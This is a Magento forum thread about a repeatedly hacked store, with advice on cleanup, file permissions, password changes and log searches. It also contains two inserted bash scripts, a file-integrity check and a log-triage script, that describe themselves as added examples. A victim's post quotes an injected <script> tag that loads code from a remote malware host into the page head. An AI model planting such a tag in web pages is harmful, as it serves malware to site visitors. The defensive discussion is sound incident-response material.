Posting in the Magento forums has been disabled pending the implementation of a new and improved forum solution which should better serve the community.

For new questions please post at magento.stackexchange.com, the community-run support site for the Magento community. We will be providing updates on the new forum solution soon. For questions or concerns please email community@magento.com.

Magento Forum

Site Hacked Twice this Week
 
express33
Member
 
Total Posts:  52
Joined:  2009-06-29
 

Hi, my website keeps getting hacked, some Russians who keep adding lines to the end of my index.php file.

I changed the permissions to: 444.

I fix it by removing the lines they add, but it's annoying and resulting in loss of sales.

How do I stop them from disrupting service of my website?

What other procedures can I do to prevent them from hacking my site? If they can do this, what else can they do?

 
Magento Community Magento Community
Magento Community
Magento Community
 
NeilA
Moderator
 
Total Posts:  1372
Joined:  2007-09-17
Blue Mountains, Oz
 

Couple of obvious things to check:

Do you have permission set correctly across the site? The attached script is very useful for doing that.
Have you:
Changed your FTP password to something strong?
Upgraded your FTP client to the latest version - most version releases are security related?
Changed your web host password?

File Attachments
magento-cleanup2.zip  (File Size: 2KB - Downloads: 193)
 
 
Kaya Arseven
Jr. Member
 
Total Posts:  12
Joined:  2009-06-29
 

- Change your hosting account, ftp, email, database passwords.
- If you are using a crack ftp application, get rid of it.
- Download Malwarebytes from download.com and scan your computer in SAFE MODE.
- Make sure you don’t have any viruses or trojans in your own computer.

 
 
Vincèn
Sr. Member
 
Total Posts:  289
Joined:  2009-01-03
Grenoble, France
 

Check also that the server itself is not compromised (use a rootkit search tool for that!). If you have any doubts about it, you’ll need to completely reinstall your server from scratch!

Vincèn

 
 
express33
Member
 
Total Posts:  52
Joined:  2009-06-29
 

My site got hacked again, but this time Google warns customers that my site be giving out malware.

I found where these Russian hackers inserted the text on a sitemap.html file

but I think that was just to fool me…

Here is the code: I don’t know what file they altered.

the website is:

http://ezgmp.com/events/ezGXP-FDA-News.php

<link rel="stylesheet" type="text/css" href="http://www.domain.com/skin/frontend/default/magento/css/reset.css" media="all" />
<link rel="stylesheet" type="text/css" href="http://www.domain.com/skin/frontend/default/magento/css/boxes.css" media="all" />
<link rel="stylesheet" type="text/css" href="http://www.domain.com/skin/frontend/default/magento/css/menu.css" media="all" />
<link rel="stylesheet" type="text/css" href="http://www.domain.com/skin/frontend/default/magento/css/clears.css" media="all" />
<link rel="stylesheet" type="text/css" href="http://www.domain.com/skin/frontend/default/magento/css/print.css" media="print" />
<!--[if IE]>
<link rel="stylesheet" type="text/css" href="http://www.domain.com/skin/frontend/default/magento/css/iestyles.css" media="all" />
<![endif]-->
<!--[if lt IE 7]>
<script type="text/javascript" src="http://www.domain.com/js/index.php?c=auto&amp;f=,lib/ds-sleight.js,varien/iehover-fix.js" ></script>
<link rel="stylesheet" type="text/css" href="http://www.domain.com/skin/frontend/default/magento/css/ie7minus.css" media="all" />
<![endif]-->
<script type="text/javascript">var Translator = new Translate([]);</script></head><script src=http://ezgmp.com/events/ezGXP-FDA-News.php ></script>

<body class=" cms-page-view cms-home">
    <div class="no-display">

I think these hackers know my ftp password, because I changed the file permissions to 444, but when I checked this morning they had the files to “write” again.

> I use FileZilla to upload files.
> I’ve scanned my computer of viruses and malwarebytes - NOTHING
> changed my passwords

I have a question:

What should my file permissions for files and folders be? 444 or 555? Or different files/folders different things?

Because I made the skin folder 444 and then my site stopped working altogether.

 
 
Workwell
Member
 
Total Posts:  63
Joined:  2010-05-05
London
 

It sounds like you have a hidden script running to re-generate the hack. There are three ways of solving this problem but as in all hacked sites the emphasis is to get it up and running asap. (So I’ll try to keep it short)

As advised, change your FTP password and again after you have finished - you could even suspend your site and only allow your IP address until fixed.

To work out the problem, grab yourself a nice cup of tea and.... Relax, it’s going to take 30mins to an hour to sort out!!

Ah.. That’s better, now where to begin.

You will need to look at the whole file structure, a pain in the backside, but the more often you do this the more familiar you’ll become.

1. I would look into the following files, malicious scripts hide by disguising themselves as genuine code especially google code. This is well documented and just about everywhere on the tinternet.

Files to check straight away: .htaccess, index.php, header and footer files - just about any file that is called on the majority of pages. (oscommerce hacks affected the application-top and includes files so I wouldn’t overlook this for magento)

Look at the following folders: media/images, js. - rogue html and php files are hidden in here - there may be a way of setting this folder which disables the running of scripts (I have done it with oscommerce). Within these large files you will find URLs for lots of sites that have nothing to do with you.

Check for files that have google validation references in the title and end with .php (in the root directory) loose files, careful you may have a genuine file or two in here.

Look for files with strange names that don’t seem to fit in. ie. blue.php, calc.php etc. and take a look at the code, if it’s very different to magento’s usual structure it’s probably malicious.

Great! I have removed all the files and code, now what!

Re-set file permissions with magento-cleanup.php (as previously suggested)

Change your FTP password again

2. Now we have to get google to remove the Trust screen when visiting your site - (That’s not good what will our customers think / Bugger!!! I didn’t stop adwords - urls not working ads now disproved… and on and on).

Once you are happy that you have removed all the code and malicious files, go to your website and click the link to re-submit your site to google for checking - it will take you off to a different page where you have to indicate that you have checked the site etc. and press submit - about an hour later wheyhey the site’s live.

3. Backup everything:- Database and Site (Cause we’re not going to get caught out again).

3b. Check your code again and keep checking it over a 48hr period - Now you know what you are looking for! If the malware returns within this period you will know you didn’t get rid of all the code and files in the first place.

3c. In future - Routinely check your file structure and set up a log for all access and changes made to the root folder.

Now, go and get your tackle out here… http://www.ukfishingandcamping.com
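
The routine file-structure check described in steps 3b and 3c above can be done as a hash baseline taken right after cleanup and compared on each later check. This is an added example, not part of the original post or the attached cleanup script; the function names and the demo tree are constructed, and GNU find/sort/xargs with sha256sum are assumed.

```shell
#!/usr/bin/env bash
# Added example: baseline-and-compare integrity check for a web root.
# Assumes GNU find/sort/xargs and sha256sum; the demo tree is constructed.

# Print a "hash  ./path" manifest for every file under ROOT ($1).
make_manifest() {
    ( cd "$1" && find . -type f -print0 | sort -z | xargs -0 -r sha256sum )
}

# Compare ROOT ($1) with a saved manifest ($2): ADDED / CHANGED / REMOVED.
compare_manifest() {
    make_manifest "$1" | awk -v old="$2" '
        BEGIN { while ((getline line < old) > 0)
                    want[substr(line, 67)] = substr(line, 1, 64) }
        { path = substr($0, 67); sum = substr($0, 1, 64)
          if (!(path in want))        print "ADDED", path
          else if (want[path] != sum) print "CHANGED", path
          delete want[path] }
        END { for (p in want) print "REMOVED", p }' | sort
}

# List PHP files under media/ and js/, which should hold no scripts.
php_in_asset_dirs() {
    ( cd "$1" && find media js -type f -name '*.php' 2>/dev/null | sort )
}

# Demo on a constructed tree: take the baseline of the clean state.
root=$(mktemp -d); manifest=$(mktemp)
mkdir -p "$root/media/images" "$root/js"
echo '<?php // constructed front controller' > "$root/index.php"
echo 'var x = 1;' > "$root/js/lib.js"
make_manifest "$root" > "$manifest"

# Constructed stand-ins for the two symptoms in this thread: a line
# appended to index.php and a stray script in media/images.
echo '<!-- constructed appended line -->' >> "$root/index.php"
echo '<?php // constructed stray file' > "$root/media/images/calc.php"

compare_manifest "$root" "$manifest"
php_in_asset_dirs "$root"
```

Keep the manifest somewhere the web and FTP accounts cannot write to, since whoever can rewrite index.php can rewrite a manifest stored beside it.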

 
 
Workwell
Member
 
Total Posts:  63
Joined:  2010-05-05
London
 

Also…

Change your admin login info and admin login URL eg. www.mymagentosite.com/admin to www.mymagentosite/fuksox18

 
 
SimpleHelixcom
Enthusiast
 
Total Posts:  906
Joined:  2007-08-31
Huntsville, AL
 

Hi there!

Suggestions seem to lean toward cleaning out your files, which is an important part, believe me!

But another thing you should definitely give a shot is searching your logs for possible hack sources.

For example:

cat ftp.log | grep php | grep Feb

For recently touched php files via FTP

cat site.log | grep php | grep POST

To search for php scripts that are receiving POST data (usually PHP shells stick out like a sore thumb)
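
The POST search above, taken one step further as an added example that is not part of the original post: it counts POSTs per PHP script and separates out scripts sitting in asset directories. It assumes an Apache/nginx "combined" access log; the function names and every log line are constructed.

```shell
#!/usr/bin/env bash
# Added example: triage an access log for PHP scripts that receive POSTs.
# Assumes Apache/nginx "combined" format; all log lines are constructed.

# Print "count path" for each .php path that received a POST, busiest first.
post_php_targets() {
    awk '$6 == "\"POST" {
             path = $7
             sub(/\?.*$/, "", path)            # ignore the query string
             if (path ~ /\.php$/) hits[path]++
         }
         END { for (p in hits) print hits[p], p }' "$1" | sort -k1,1nr -k2,2
}

# Narrow to scripts under directories that should hold only static assets.
post_php_in_asset_dirs() {
    post_php_targets "$1" | awk '$2 ~ /^\/(media|js|skin)\// { print $2 }'
}

# Constructed sample log (documentation-range addresses, made-up times).
write_sample_log() {
    cat > "$1" <<'EOF'
198.51.100.4 - - [12/Feb/2011:03:10:01 +0000] "GET /index.php HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
198.51.100.4 - - [12/Feb/2011:03:10:09 +0000] "POST /index.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.9 - - [12/Feb/2011:03:11:30 +0000] "POST /index.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Feb/2011:03:14:07 +0000] "GET /media/images/calc.php HTTP/1.1" 200 120 "-" "-"
203.0.113.7 - - [12/Feb/2011:03:14:08 +0000] "POST /media/images/calc.php HTTP/1.1" 200 512 "-" "-"
203.0.113.7 - - [12/Feb/2011:03:14:11 +0000] "POST /media/images/calc.php HTTP/1.1" 200 498 "-" "-"
203.0.113.7 - - [12/Feb/2011:03:14:15 +0000] "POST /media/images/calc.php HTTP/1.1" 200 733 "-" "-"
203.0.113.7 - - [12/Feb/2011:03:15:02 +0000] "POST /js/blue.php?x=1 HTTP/1.1" 200 64 "-" "-"
198.51.100.4 - - [12/Feb/2011:03:16:40 +0000] "GET /skin/frontend/default/magento/css/reset.css HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
EOF
}

sample_log=$(mktemp)
write_sample_log "$sample_log"
post_php_targets "$sample_log"
```

POSTs to index.php are normal store traffic; the paths worth opening first are the ones the second function returns, because nothing under media/, js/ or skin/ should be accepting form data.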

 
 
WebhostUK LTD
Sr. Member
 
Total Posts:  163
Joined:  2009-08-27
UK
 

Install suPHP and suEXEC on your server, this will avoid nobody upload on your site.

 